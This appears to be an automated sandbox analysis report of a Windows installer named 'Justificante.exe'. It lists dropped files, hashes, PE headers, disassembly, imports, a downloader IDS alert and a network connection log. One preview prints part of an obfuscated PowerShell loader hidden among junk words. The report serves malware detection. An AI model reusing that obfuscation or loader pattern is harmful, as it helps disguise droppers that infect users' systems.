                        Preview:$Uddelegeringerne=$Bindingsvrksbygningdmirations;..<#Tabuerings Stentorstemmen Selvbyggeris Vandlbsforureningers #>..<#Diatomite Reformationer liturgistic Germaniseret Tondi Rattlers Styringsegnede #>..<#Statussymbolernes Studiesteds Bushwhackers biofag Weewow Befetished Vrage #>..<#regressionsanalysers Sedlernes Icelandic #>..<#Forkasteligt Fluorogenic Unraveling Forrettigheders tussehs #>..<#Baadejere Barbermaskiner uncontrolled Rubricose Interessentskabsaftalerne #>...$Hoatching = @'.Straa.Lust,$FraviTS,livrCoxaloK stnpChebui udsesSadhamInflae Antir Mulis Prime,omosg K.len Co,siRepelnKoncegLu tre SulkrActinsknif = Dece$ S oeBExproiUdtvrnTuartd PrveiPreagnCosheg .osksVerniv EdbrrFi,vakforlisB oadb Skr.y Svmmgnordkn kattiTrivin.dermgHorolnElicitunliqiSu.rimDetaia ,eflsDagsroLeptonIn fa;Denja. nonsfAandeu.nwarnT,ericAlin,tFortniNnne.oTekstnBevid Vr,esDInc ieGus.if rakieSkrpecLimbitEssenoF tinr.inde Stipp( Zucc$U locBd ssciOlivinSup,rdSunroiLedabnDe.leg MultsKulklv Partr Po hk.okats,rer
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):404960
                        Entropy (8bit):1.2539637209765142
                        Encrypted:false
                        SSDEEP:768:PpaN0L27G+adCA0On7ixPzwv9b6iWddF+xsjd9ri4zWdx4e5yO7lqXfcCac+wsEt:1xCaSjdFWOzjXODGTPOxDdKxX4UGs
                        MD5:70ED615036BBA1FE3CD94B9E1DD9B532
                        SHA1:284DF5F97DD305620807EC5CB2B9911619BD38E6
                        SHA-256:7584DBB9B36AB8273CB8B55F2F1F01952FB5C63ECD111C0D829403192B86271F
                        SHA-512:E761B8C76D93AA067BD102FF5D6B335E62ED340436020757BF863D67995029C434CF917B239632F1B24F765755E99574D32AB194960074D75418AFF31C14144F
                        Malicious:false
                        Preview:..............+.#............................................................E.............^................................................-......{....... ...v...Z..............................................8.....................a...........v............................................................s..............E..k.........................................................u................A............................)...............................W................................................................................................................................K....O.............................................................................................../................................................m...v.........................j.........^.................................Y........................|..................*.................................h................................c............................................................................
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):232819
                        Entropy (8bit):1.2428101350516447
                        Encrypted:false
                        SSDEEP:768:8NDieXWfKpcq+Q2mPGSchs7CiiWZcare7evVHZ2mX+hss8RSHwN0gDVoWwSMcP0q:0XfxFimsX2ZTn2rIaSd1+
                        MD5:7459BF293DD14A6F7225192B0B4B96C7
                        SHA1:2BEE6095E83ED4F6C80F11677CCFE6833EC0F6AA
                        SHA-256:23928DF448B222A8DA56CF9204175F8792BA660B9B3AF4A7FCEDC8D8740C3D7C
                        SHA-512:7D8E3E3A18A3DB75C13DD0D867EB25290C9D85221203B119D1CF25330BE26B201102E3D4D49DDE721D11692C8EDAD9A92771438361ACBA9900C43E6D9436EAF7
                        Malicious:false
                        Preview:..........1........}...............................u...Q.....................V.........................3.............................................}............w................L.................................,.....9...............................................................k............................k........^.............................................../..............}^................................................................................................................................L...................................................................................G..............0............................................................................`......o...................................p)......}...................................................................................................O.....................................................A........k..D...|................................#.......................................................
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):354994
                        Entropy (8bit):1.2540722835285425
                        Encrypted:false
                        SSDEEP:768:8/AKcI0EdmvV1QkviXQ/9TdZDGeoeq0gc42AnEjPQWdEpavLRmkbGPMJQ/GQaBc8:lLmC+Uhy2Jj8fexlj2jApfTRjao
                        MD5:E3AD5C4AA0CFA157C13B879ACD182924
                        SHA1:5AB8F173A5EFE311420E4988CCD21001C93FD44B
                        SHA-256:A28BFF6B6CF4B3ECE930779F7ECBF251437F12B9D5962B417F9865AD17636400
                        SHA-512:759C85ACA9DFB267679BFD808C1790347B92F84DE9E863553E1E7B3AFC4635EADE1DCC1E3EAF395BF684C3EC50ED4C32614A3BEFCC1DAB0E452311BD405E45C5
                        Malicious:false
                        Preview:.............J6...................................................~...............................0..........;...................N...........j..3...L.............................................................]...X..........................._...........................#..................i......i.....................................................(................_.....................o...............K.....................................q...... ..u........................e..............................................!.................................................................{.............J..........................................N....,..................Hz...........................................................................T....m.........................................X......................................................................................................................E.aJ.................................................................................
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):260786
                        Entropy (8bit):1.2489055466142445
                        Encrypted:false
                        SSDEEP:768:rKqDadwuWgiY4EIxjcWHXlxWRaiUabM1LeErmqUwpCzfTw8KtNfiE10z0WZ8J0Sk:9YMiW3lYRnU1bDsGpYCJ6GsK3bq
                        MD5:F5FC181F5F8AADAF42270FDD65EF84A2
                        SHA1:B52CDE1731D7F6307B8279DF32272D4BDB339491
                        SHA-256:7C793AAAAD5EB0D30AE4813E38EC3C6F6C79D000538729637D92042532BA5136
                        SHA-512:A924A619620DD0C00307AB48E771E15DE96E42AF39AE7358F953955D0E6F8E55033CE6CE4BEE0E7780727C12CC76FE1B72E832FC5FCC62C7F2D483E75DEF31E3
                        Malicious:false
                        Preview:......=.................e.............................7.....................................9...........................................................9.................[....................].....%D................`....................................G.......C......B..................m.[...............................................................4........9..................(...........^.................................m............................U....[................,.......................................O.................{...........................................................................................................................2....................................................................\....Y.............x.........<!...................C.................M...h............................................................................................................. .............................................................J..........................
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):378313
                        Entropy (8bit):1.254818848790239
                        Encrypted:false
                        SSDEEP:768:dZ7RXG+/V5YcLeoYXekIdTt5ZBgFafl7e1UreZ4rP6hzE8japmIr1peXw9ZjUtjd:lMXq1XaCvwsRYXtDQSFMwl3kudbldx1
                        MD5:85D059495DD7A45590D6A55B34EE7F31
                        SHA1:3D177034FA0D6C9508ADC61C22CC42448ABA2841
                        SHA-256:0FFE13C01F55C13132FA0EF378F5456709892C090BECEAAEF0914D994D3D9C46
                        SHA-512:22AE223550D92B0BF6C387FA07FBC2C03C5DB4E1EF59C4086F00D3CF265C004FAC7C7C7F1EB8D04E90784BE5868017FC25843C981636B60DADABFE26A62C7908
                        Malicious:false
                        Preview:D.a..................g............................y...<..........................................................................n......................................g.......................................,....U.........................................e...............yN...............!................................................................................-.........O........C..X...........K.................:......................v........................................... ...............'...........O..............u..}..............................$..............L..........................................M.................................Z........(................................................................................................./.........................x.............................................................................9............................................................................>............................t...............d.... ....
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:DIY-Thermocam raw data (Lepton 2.x), scale 116-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 128.000000
                        Category:dropped
                        Size (bytes):235060
                        Entropy (8bit):1.2512601304375985
                        Encrypted:false
                        SSDEEP:768:bx1OLvd9+Np6116yx38wt9zQVBsuR/1samMQmIihfM0puah7KhD2KaW0qkY9nPCQ:FcvdUBL/1v7uaWFEt
                        MD5:5E2A2C05A81F24EE4D0B050E67FAE817
                        SHA1:0122F59156F4FE2FEC4CD89C52411120AAE457E6
                        SHA-256:D3CDB75BF7AAF59F718FACAF16B37FDCE2CF44F65001B17CD828303282F5ADF2
                        SHA-512:A6208AA83B30E90A238E828C2BD338B70C7D88CE13B0B02EE6A39476CA8B84AEAD96CC567F9875AD817E29516AA708928E287E90E23F005F3166AD65BDDE106F
                        Malicious:false
                        Preview:.....................=.O........B.............................................................................Y....................s..........................................h..........................2Qn......................................................................K.....................5...............,.........................7......r.1..................................q..........f.........,.N........................ ..........................!.......................L......'..........................................................................................;............+.[D......................................z...................................................m................M..........j...>........>.............................3.....V...........................................................................................@................................!...........!.....o............................................H.....i.........................................
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):505
                        Entropy (8bit):4.247549717294304
                        Encrypted:false
                        SSDEEP:12:DGWhS9pbf55GAWvp68PLaxD9WKgNUFt2nQ2:Dk9pFyxJPLaPWrQ2
                        MD5:04A01644A733FB7ED73FFCC807AA508F
                        SHA1:CA03E907E76754B0FB66E06A8150A37E45042C52
                        SHA-256:258803F87B8DF112F73C5D0E5075D348C0119B53691CEF3436DF6FD70F461B7A
                        SHA-512:5DEBD35DC37BD1F339CFC51245E849DF81A7664B781B4A1BA03C0439D8C0AF7042CD4984506E8671198E640384B533F0090C9E282B879142F4536CF6D996FDB3
                        Malicious:false
                        Preview:spillebulernes hatracks strmafbrydelsernes nonglare elektroingenirernes questioners logerende,nevermass hoblike classiest forlbnes heteroerotic gastrocatarrhal paridigitate..arbejdsvogn detectivism ferries kamsin apanteles heliconian scyphistomoid manicurists ugedagen kateten chikaners rakitissen feudalistiskes..incomposedness langblges cardiocirrhosis smalfilmet,opgrelsesdatoen kliddet salamanderlike eza komedianters shipwrights,kalmusrod exomphalus subalternation ubnhrligeres kursussteder isodiazo.
                        Process:C:\Users\user\Desktop\Justificante.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):201364
                        Entropy (8bit):7.762239752762983
                        Encrypted:false
                        SSDEEP:3072:ttMVuOkQzBpRj3gwmEiXQF4L+oE+qpQOJR3ScGI6q/dCLucEey9Bi:fcuO/BLmJ+oQnJRCc0q06WIBi
                        MD5:E6C88AD587F8E2B7F6B8BC1EAA9E1A96
                        SHA1:A475C06AECC87B897035AC63E79B53AE164FFAB1
                        SHA-256:D42703E8DEF312E5EEB03D5A1CF458C06D77CF436D0E57853FF046E047F768FC
                        SHA-512:05CFFAB197B599FB333A428F2318926542E17D63DB6C574AC15337AF5CB2EE042C54CC6061C6F3DA03A221DB712C0495BCC55B9C84F83724BB68F759D5B13162
                        Malicious:false
                        Preview:...........`..aa........................................T..QQ......g..................'.c..lllll..ooo.i...........xxxxx.......ee.................ZZ.............qq.......2..............{{...P.zz..ff.........................z..I......Q.................333..p.......................z......QQ...........Z......dddddd........--.......55.....xx...zzz.........!!.IIIII..(.........g.T.........QQ.TT.......3333.s.................%%%...............*...............................555................QQ..............}}...........ee....ddd....p...$..........qqqqqq.....K.MM...............;;;;......44.....AAAAAA....BB.........ggg..O......______....4.%%..x.............................................zz.MM..\\.....ttttttt...................Y....Z.?.........hh.............%......e................g........(..>.....4.D........zz...``...<...............44..gggg.--.|......................1......... ..a.......................ccc.XXXX................e..ZZ...............6.aa..||..................[.........[.....www
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                        Entropy (8bit):7.723680980803217
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:Justificante.exe
                        File size:777'760 bytes
                        MD5:73fd5954cb5be48ea11d738097fdda5a
                        SHA1:6aab0cb9ddb07d3c3386e6ff72c2f969339e31f7
                        SHA256:27d88a843003bf67d0bf917db5a57620810b08c76c91e18d00c3d89c7d459545
                        SHA512:bab35c114448dc2a6f6bbb374bc2b006a9c5e7df2653f2a8a9a616ae3ce70b22e25311986aed72415e8d3f448d293a849fa4a557690d5b9748305d50e93e6c36
                        SSDEEP:12288:RgeuCaz4Fr0BktHwDmKoNxlA8rQt9P9g1WyQ9OpERjsOwfJnuW8EnIu5OQ:Rgwa0FzwDzoO8LWyQ9ySjYfJu1cl
                        TLSH:29F40110E4D18451EDCA7A708B55FB8E4A62BFE3747084862F71BE03BAF4742B946CE5
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L......`.................f...*.....
                        Icon Hash:0d1c58da92c4e273
                        Entrypoint:0x4035d8
                        Entrypoint Section:.text
                        Digitally signed:true
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Time Stamp:0x60FC91EE [Sat Jul 24 22:19:26 2021 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:c05041e01f84e1ccca9c4451f3b6a383
                        Signature Valid:false
                        Signature Issuer:CN=Stokkene, O=Stokkene, L=Bruges, C=FR
                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                        Error Number:-2146762487
                        Not Before, Not After
                        • 14/02/2024 00:55:13 13/02/2027 00:55:13
                        Subject Chain
                        • CN=Stokkene, O=Stokkene, L=Bruges, C=FR
                        Version:3
                        Thumbprint MD5:9867912BE4CBE23A505FBDF93200382E
                        Thumbprint SHA-1:10606E724AD8E5EA0486BAB0087A6709CB74B820
                        Thumbprint SHA-256:7A7A448CC99A17C49600388F7A07EB4C6F45F411FC523897E8BCFB4DA274B1A7
                        Serial:07928DD17D93924B33654087DA6A1A0CD5572531
                        Instruction
                        sub esp, 000002D4h
                        push ebx
                        push esi
                        push edi
                        push 00000020h
                        pop edi
                        xor ebx, ebx
                        push 00008001h
                        mov dword ptr [esp+14h], ebx
                        mov dword ptr [esp+10h], 0040A230h
                        mov dword ptr [esp+1Ch], ebx
                        call dword ptr [004080C8h]
                        call dword ptr [004080CCh]
                        and eax, BFFFFFFFh
                        cmp ax, 00000006h
                        mov dword ptr [0042A26Ch], eax
                        je 00007F13009200E3h
                        push ebx
                        call 00007F13009233E9h
                        cmp eax, ebx
                        je 00007F13009200D9h
                        push 00000C00h
                        call eax
                        mov esi, 004082B0h
                        push esi
                        call 00007F1300923363h
                        push esi
                        call dword ptr [00408154h]
                        lea esi, dword ptr [esi+eax+01h]
                        cmp byte ptr [esi], 00000000h
                        jne 00007F13009200BCh
                        push 0000000Bh
                        call 00007F13009233BCh
                        push 00000009h
                        call 00007F13009233B5h
                        push 00000007h
                        mov dword ptr [0042A264h], eax
                        call 00007F13009233A9h
                        cmp eax, ebx
                        je 00007F13009200E1h
                        push 0000001Eh
                        call eax
                        test eax, eax
                        je 00007F13009200D9h
                        or byte ptr [0042A26Fh], 00000040h
                        push ebp
                        call dword ptr [00408038h]
                        push ebx
                        call dword ptr [00408298h]
                        mov dword ptr [0042A338h], eax
                        push ebx
                        lea eax, dword ptr [esp+34h]
                        push 000002B4h
                        push eax
                        push ebx
                        push 00421708h
                        call dword ptr [0040818Ch]
                        push 0040A384h
                        Programming Language:
                        • [EXP] VC++ 6.0 SP5 build 8804
                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x600000x1c778.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0xbd5300x8f0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000x65720x6600869e1d11bbf88d92521c022fa6f3d4f0False0.6623008578431373data6.453919385955138IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        .rdata0x80000x13980x140079e286249499b713a2ddbee33baa50daFalse0.449609375data5.1367175827370986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        .data0xa0000x203780x600b6d02c867f7bfbcf68de2cfeea94fd73False0.5078125data4.096809083627214IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .ndata0x2b0000x350000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc0x600000x1c7780x1c800b91e26e6208d37c7e205f7d90ea83a0aFalse0.25319524396929827data4.499106927490981IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                        NameRVASizeTypeLanguageCountryZLIB Complexity
                        RT_BITMAP0x603a00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                        RT_ICON0x607080x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.0935466698213652
                        RT_ICON0x70f300x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.21215162966461976
                        RT_ICON0x751580x2f66PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.994890390637877
                        RT_ICON0x780c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.2857883817427386
                        RT_ICON0x7a6680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.4294090056285178
                        RT_ICON0x7b7100x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.624113475177305
                        RT_DIALOG0x7bb780x144dataEnglishUnited States0.5216049382716049
                        RT_DIALOG0x7bcc00x13cdataEnglishUnited States0.5506329113924051
                        RT_DIALOG0x7be000x120dataEnglishUnited States0.5104166666666666
                        RT_DIALOG0x7bf200x11cdataEnglishUnited States0.6056338028169014
                        RT_DIALOG0x7c0400xc4dataEnglishUnited States0.5918367346938775
                        RT_DIALOG0x7c1080x60dataEnglishUnited States0.7291666666666666
                        RT_GROUP_ICON0x7c1680x5adataEnglishUnited States0.7777777777777778
                        RT_VERSION0x7c1c80x26cdataEnglishUnited States0.532258064516129
                        RT_MANIFEST0x7c4380x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                        DLLImport
                        ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                        SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                        ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                        USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, SetWindowPos, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                        GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                        KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersion, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, ExitProcess, CopyFileW, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States
                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-10-22T16:04:30.150097+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949713142.250.184.238443TCP
                        TimestampSource PortDest PortSource IPDest IP
                        Oct 22, 2024 16:04:28.836812973 CEST49713443192.168.2.9142.250.184.238
                        Oct 22, 2024 16:04:28.836862087 CEST44349713142.250.184.238192.168.2.9
                        Oct 22, 2024 16:04:28.836922884 CEST49713443192.168.2.9142.250.184.238
                        Oct 22, 2024 16:04:28.859672070 CEST49713443192.168.2.9142.250.184.238
                        Oct 22, 2024 16:04:28.859694004 CEST44349713142.250.184.238192.168.2.9
                        Oct 22, 2024 16:04:29.719561100 CEST44349713142.250.184.238192.168.2.9
                        Oct 22, 2024 16:04:29.719634056 CEST49713443192.168.2.9142.250.184.238
                        Oct 22, 2024 16:04:29.720648050 CEST44349713142.250.184.238192.168.2.9
                        Oct 22, 2024 16:04:29.720947981 CEST49713443192.168.2.9142.250.184.238
                        Oct 22, 2024 16:04:29.776737928 CEST49713443192.168.2.9142.250.184.238
                        Oct 22, 2024 16:04:29.776762962 CEST44349713142.250.184.238192.168.2.9
                        Oct 22, 2024 16:04:29.777704000 CEST44349713142.250.184.238192.168.2.9
                        Oct 22, 2024 16:04:29.777785063 CEST49713443192.168.2.9142.250.184.238
                        Oct 22, 2024 16:04:29.780828953 CEST49713443192.168.2.9142.250.184.238
                        Oct 22, 2024 16:04:29.823329926 CEST44349713142.250.184.238192.168.2.9
                        Oct 22, 2024 16:04:30.150099993 CEST44349713142.250.184.238192.168.2.9
                        Oct 22, 2024 16:04:30.150206089 CEST49713443192.168.2.9142.250.184.238
                        Oct 22, 2024 16:04:30.150413990 CEST49713443192.168.2.9142.250.184.238
                        Oct 22, 2024 16:04:30.150496006 CEST44349713142.250.184.238192.168.2.9
                        Oct 22, 2024 16:04:30.150554895 CEST49713443192.168.2.9142.250.184.238
                        Oct 22, 2024 16:04:30.179338932 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:30.179400921 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:30.179544926 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:30.181498051 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:30.181526899 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:31.038409948 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:31.038625002 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:31.052190065 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:31.052223921 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:31.052496910 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:31.054240942 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:31.054719925 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:31.099332094 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.113689899 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.113751888 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.120124102 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.120183945 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.229233027 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.229321957 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.229343891 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.229377031 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.229840040 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.229873896 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.229891062 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.229919910 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.231409073 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.231451988 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.231761932 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.231796026 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.235632896 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.235687971 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.235702038 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.235738993 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.244486094 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.244553089 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.244566917 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.244605064 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.276464939 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.276551962 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.276858091 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.276901007 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.276912928 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.276947975 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.277669907 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.277710915 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.278091908 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.278126955 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.278134108 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.278181076 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.280591011 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.280725956 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.280750990 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.280787945 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.288116932 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.288239002 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.288269043 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.288310051 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.347368956 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.347440958 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.347455978 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.347492933 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.347862005 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.347908020 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.347915888 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.347954988 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.348407984 CEST44349715142.250.186.97192.168.2.9
                        Oct 22, 2024 16:04:34.348450899 CEST49715443192.168.2.9142.250.186.97
                        Oct 22, 2024 16:04:34.348459005 CEST44349715142.250.186.97192.168.2.9
